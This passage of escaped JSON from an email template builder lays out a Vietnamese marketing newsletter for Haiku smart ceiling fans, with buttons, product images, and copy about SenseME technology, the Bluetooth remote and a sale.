SERIES<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_14\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"7_rSdc1TtT\\\",\\\"contents\\\":[{\\\"id\\\":\\\"x_22-LcpU4\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/hogiaphat.vn\\/upload\\/docs\\/haiku\\/haiku_new2022\\/cutsheet-haiku-en.pdf\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#843fa1\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"10px 20px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"4px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_4\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\">HAIKU OUTDOOR<\\/span>\\\",\\\"calculatedWidth\\\":130,\\\"calculatedHeight\\\":54},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_15\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_8\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"RYZiqC9Ge_\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"_8LBi9___H\\\",\\\"contents\\\":[{\\\"id\\\":\\\"_s7AkbMQ6N\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_3\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">Haiku \\u0111\\u00e3 gi\\u00e0nh \\u0111\\u01b0\\u1ee3c h\\u01a1n 75 gi\\u1ea3i th\\u01b0\\u1edfng c\\u00f4ng ngh\\u1ec7 v\\u00e0 thi\\u1ebft k\\u1ebf. Ti\\u1ebft ki\\u1ec7m \\u0111i\\u1ec7n hi\\u1ec7u qu\\u1ea3 nh\\u1ea5t theo ti\\u00eau chu\\u1ea9n ENERGY STAR\\u00ae, n\\u01a1i m\\u00e0 qu\\u1ea1t Haiku Fans \\u0111\\u00e3 chi\\u1ebfm t\\u1edbi 19 v\\u1ecb tr\\u00ed h\\u00e0ng \\u0111\\u1ea7u.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"-tv4jVob68\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502718754-cambien_senseME.jpg\\\",\\\"width\\\":1621,\\\"height\\\":1292},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_4\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"Al64RPrqki\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_4\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<strong>C\\u00d4NG NGH\\u1ec6 SENSEME\\u2122<\\/strong>\\\"}},{\\\"id\\\":\\\"3vM6it4cB4\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"28px 33px 25px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"color\\\":\\\"#444444\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"200%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_deprecated_1\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 200%;\\\\\\\">B\\u1ed9 n\\u00e3o \\u0111\\u1eb1ng sau nh\\u1eefng chi\\u1ebfc qu\\u1ea1t tr\\u1ea7n th\\u00f4ng minh nh\\u1ea5t th\\u1ebf gi\\u1edbi, c\\u00f4ng ngh\\u1ec7 SenseMe\\u2122 \\u0111\\u01b0\\u1ee3c c\\u1ea5p b\\u1eb1ng s\\u00e1ng ch\\u1ebf, gi\\u00fap b\\u1ea1n tho\\u1ea3i m\\u00e1i t\\u1eeb m\\u1ecdi g\\u00f3c \\u0111\\u1ed9 s\\u1eed d\\u1ee5ng qu\\u1ea1t tr\\u1ea7n.<\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"3XywiR4X-b\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677502936864-sen_1.png\\\",\\\"width\\\":900,\\\"height\\\":170},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_6\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"e-hJ3MnqLx\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503569736-bamboo-caramel.jpg\\\",\\\"width\\\":2000,\\\"height\\\":900},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_12\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_5\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_4\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"TYDvAo7QXc\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"KkKlsm36KR\\\",\\\"contents\\\":[{\\\"id\\\":\\\"5XMfCB2N_C\\\",\\\"type\\\":\\\"button\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px 10px 0px\\\",\\\"anchor\\\":\\\"\\\",\\\"href\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"https:\\/\\/www.quatcaocap.com\\/quat-tran-thong-minh-haiku\\\",\\\"target\\\":\\\"_blank\\\"},\\\"attrs\\\":{\\\"href\\\":\\\"{{href}}\\\",\\\"target\\\":\\\"{{target}}\\\"}},\\\"buttonColors\\\":{\\\"color\\\":\\\"#FFFFFF\\\",\\\"backgroundColor\\\":\\\"#e03e2d\\\",\\\"hoverColor\\\":\\\"#FFFFFF\\\",\\\"hoverBackgroundColor\\\":\\\"#3AAEE0\\\"},\\\"size\\\":{\\\"autoWidth\\\":true,\\\"width\\\":\\\"100%\\\"},\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"120%\\\",\\\"padding\\\":\\\"15px 44px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"40px\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_button_1\\\",\\\"htmlClassNames\\\":\\\"u_content_button\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<span style=\\\\\\\"line-height: 16.8px;\\\\\\\"><strong><span style=\\\\\\\"line-height: 16.8px;\\\\\\\">XEM SHOP - SALE UP TO 15%<\\/span><\\/strong><\\/span>\\\",\\\"hideMobile\\\":false,\\\"calculatedWidth\\\":283,\\\"calculatedHeight\\\":47},\\\"hasDeprecatedFontControls\\\":true},{\\\"id\\\":\\\"fhAyvauViK\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#d8d0d0\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_3\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"4l6DIuGJqW\\\",\\\"type\\\":\\\"heading\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"headingType\\\":\\\"h2\\\",\\\"fontSize\\\":\\\"20px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_heading_5\\\",\\\"htmlClassNames\\\":\\\"u_content_heading\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"\\u0110I\\u1ec0U KHI\\u1ec2N TI\\u1ec6N \\u00cdCH - TH\\u00d4NG MINH\\\"}},{\\\"id\\\":\\\"_K40u5XnIY\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontSize\\\":\\\"14px\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_7\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"line-height: 140%;\\\\\\\">Ki\\u1ec3m so\\u00e1t t\\u1ed1t h\\u01a1n c\\u00e1c t\\u00ednh n\\u0103ng n\\u00e2ng cao c\\u1ee7a Haiku v\\u1edbi \\u0111i\\u1ec1u khi\\u1ec3n t\\u1eeb xa bluetooth cao c\\u1ea5p. \\u0110i\\u1ec1u ch\\u1ec9nh t\\u1ed1c \\u0111\\u1ed9 qu\\u1ea1t c\\u1ee7a b\\u1ea1n, thay \\u0111\\u1ed5i t\\u00f9y ch\\u1ecdn \\u00e1nh s\\u00e1ng ho\\u1eb7c s\\u1eed d\\u1ee5ng t\\u1ea5t c\\u1ea3 c\\u00e1c ch\\u1ebf \\u0111\\u1ed9 H\\u1eb9n gi\\u1edd, Xo\\u00e1y v\\u00e0 Ng\\u1ee7 m\\u00e0 kh\\u00f4ng c\\u1ea7n r\\u1eddi kh\\u1ecfi ch\\u1ed7 ng\\u1ed3i c\\u1ee7a b\\u1ea1n. N\\u1ebfu b\\u1ea1n lu\\u00f4n lu\\u00f4n m\\u1ea5t \\u0111\\u1ed3? \\u0110i\\u1ec1u khi\\u1ec3n t\\u1eeb xa \\u0111i k\\u00e8m v\\u1edbi m\\u1ed9t gi\\u00e1 treo t\\u01b0\\u1eddng \\u0111\\u01a1n gi\\u1ea3n \\u0111\\u1ec3 \\u0111\\u1eb7t thu\\u1eadn ti\\u1ec7n v\\u00e0 an to\\u00e0n.<\\/p>\\\"}}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_3\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_3\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"lz-ixEIpPZ\\\",\\\"cells\\\":[1,1,1],\\\"columns\\\":[{\\\"id\\\":\\\"MJlj9zB0N8\\\",\\\"contents\\\":[{\\\"id\\\":\\\"XiwlcZ22cN\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677504582593-dieu-khien-haiku.png\\\",\\\"width\\\":813,\\\"height\\\":908},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_8\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_7\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"njYx9-f90X\\\",\\\"contents\\\":[{\\\"id\\\":\\\"7zgjSmD-a1\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503408657-intergatehaiku.jpg\\\",\\\"width\\\":800,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_9\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_8\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}},{\\\"id\\\":\\\"y9235nL0ac\\\",\\\"contents\\\":[{\\\"id\\\":\\\"z59_MxupRK\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503423701-remote_control.jpg\\\",\\\"width\\\":800,\\\"height\\\":800},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_10\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}}],\\\"values\\\":{\\\"backgroundColor\\\":\\\"\\\",\\\"padding\\\":\\\"0px\\\",\\\"border\\\":{},\\\"borderRadius\\\":\\\"0px\\\",\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_9\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"}}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"center\\\"},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_6\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"YbLHtpjkh0\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"jW9WWipw8d\\\",\\\"contents\\\":[{\\\"id\\\":\\\"jYPxTblxnF\\\",\\\"type\\\":\\\"divider\\\",\\\"values\\\":{\\\"width\\\":\\\"100%\\\",\\\"border\\\":{\\\"borderTopWidth\\\":\\\"1px\\\",\\\"borderTopStyle\\\":\\\"solid\\\",\\\"borderTopColor\\\":\\\"#95a5a6\\\"},\\\"textAlign\\\":\\\"center\\\",\\\"containerPadding\\\":\\\"18px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_divider_1\\\",\\\"htmlClassNames\\\":\\\"u_content_divider\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false}},{\\\"id\\\":\\\"LZdJbsA_5d\\\",\\\"type\\\":\\\"image\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"10px\\\",\\\"anchor\\\":\\\"\\\",\\\"src\\\":{\\\"url\\\":\\\"https:\\/\\/assets.unlayer.com\\/stock-templates1677503713719-home_haiku.jpg\\\",\\\"width\\\":1920,\\\"height\\\":944},\\\"textAlign\\\":\\\"center\\\",\\\"altText\\\":\\\"\\\",\\\"action\\\":{\\\"name\\\":\\\"web\\\",\\\"values\\\":{\\\"href\\\":\\\"\\\",\\\"target\\\":\\\"_blank\\\"}},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_image_13\\\",\\\"htmlClassNames\\\":\\\"u_content_image\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true}},{\\\"id\\\":\\\"HG30UIk3ly\\\",\\\"type\\\":\\\"text\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"19px 33px 40px\\\",\\\"anchor\\\":\\\"\\\",\\\"fontFamily\\\":{\\\"label\\\":\\\"Source Sans Pro\\\",\\\"value\\\":\\\"\'Source Sans Pro\',sans-serif\\\",\\\"url\\\":\\\"https:\\/\\/fonts.googleapis.com\\/css?family=Source+Sans+Pro:400,700\\\",\\\"defaultFont\\\":true,\\\"weights\\\":[400,700]},\\\"fontWeight\\\":700,\\\"fontSize\\\":\\\"28px\\\",\\\"color\\\":\\\"#236fa1\\\",\\\"textAlign\\\":\\\"center\\\",\\\"lineHeight\\\":\\\"140%\\\",\\\"linkStyle\\\":{\\\"inherit\\\":true,\\\"linkColor\\\":\\\"#0000ee\\\",\\\"linkHoverColor\\\":\\\"#0000ee\\\",\\\"linkUnderline\\\":true,\\\"linkHoverUnderline\\\":true},\\\"hideDesktop\\\":false,\\\"displayCondition\\\":null,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_content_text_2\\\",\\\"htmlClassNames\\\":\\\"u_content_text\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"text\\\":\\\"<p style=\\\\\\\"font-size: 14px; line-height: 140%;\\\\\\\"><span style=\\\\\\\"font-size: 24px; line-height: 33.6px; font-family: \'Source Sans Pro\', sans-serif;\\\\\\\">Kh\\u00f4ng Ch\\u1ec9 L\\u00e0 M\\u00e1t - M\\u00e0 C\\u00f2n H\\u01a1n Th\\u1ebf N\\u1eefa<\\/span><\\/p>\\\",\\\"hideMobile\\\":false},\\\"hasDeprecatedFontControls\\\":true}],\\\"values\\\":{\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_column_2\\\",\\\"htmlClassNames\\\":\\\"u_column\\\"},\\\"border\\\":{},\\\"padding\\\":\\\"0px\\\",\\\"backgroundColor\\\":\\\"\\\"}}],\\\"values\\\":{\\\"displayCondition\\\":null,\\\"columns\\\":false,\\\"backgroundColor\\\":\\\"\\\",\\\"columnsBackgroundColor\\\":\\\"#f9f9f9\\\",\\\"backgroundImage\\\":{\\\"url\\\":\\\"\\\",\\\"fullWidth\\\":true,\\\"repeat\\\":\\\"no-repeat\\\",\\\"size\\\":\\\"custom\\\",\\\"position\\\":\\\"top-center\\\",\\\"customPosition\\\":[\\\"50%\\\",\\\"0%\\\"]},\\\"padding\\\":\\\"0px\\\",\\\"anchor\\\":\\\"\\\",\\\"hideDesktop\\\":false,\\\"_meta\\\":{\\\"htmlID\\\":\\\"u_row_2\\\",\\\"htmlClassNames\\\":\\\"u_row\\\"},\\\"selectable\\\":true,\\\"draggable\\\":true,\\\"duplicatable\\\":true,\\\"deletable\\\":true,\\\"hideable\\\":true,\\\"hideMobile\\\":false,\\\"noStackMobile\\\":false}},{\\\"id\\\":\\\"04gNugS9ys\\\",\\\"cells\\\":[1],\\\"columns\\\":[{\\\"id\\\":\\\"2mvPoFJCm5\\\",\\\"contents\\\":[{\\\"id\\\":\\\"ZA8TJ3zleD\\\",\\\"type\\\":\\\"social\\\",\\\"values\\\":{\\\"containerPadding\\\":\\\"30px 4px 4px\\\",\\\"anchor\\\":\\\"\\\",\\\"icons\\\":{\\\"iconType\\\":\\\"squared\\\",\\\"icons\\\":[{\\\"url\\\":\\\" 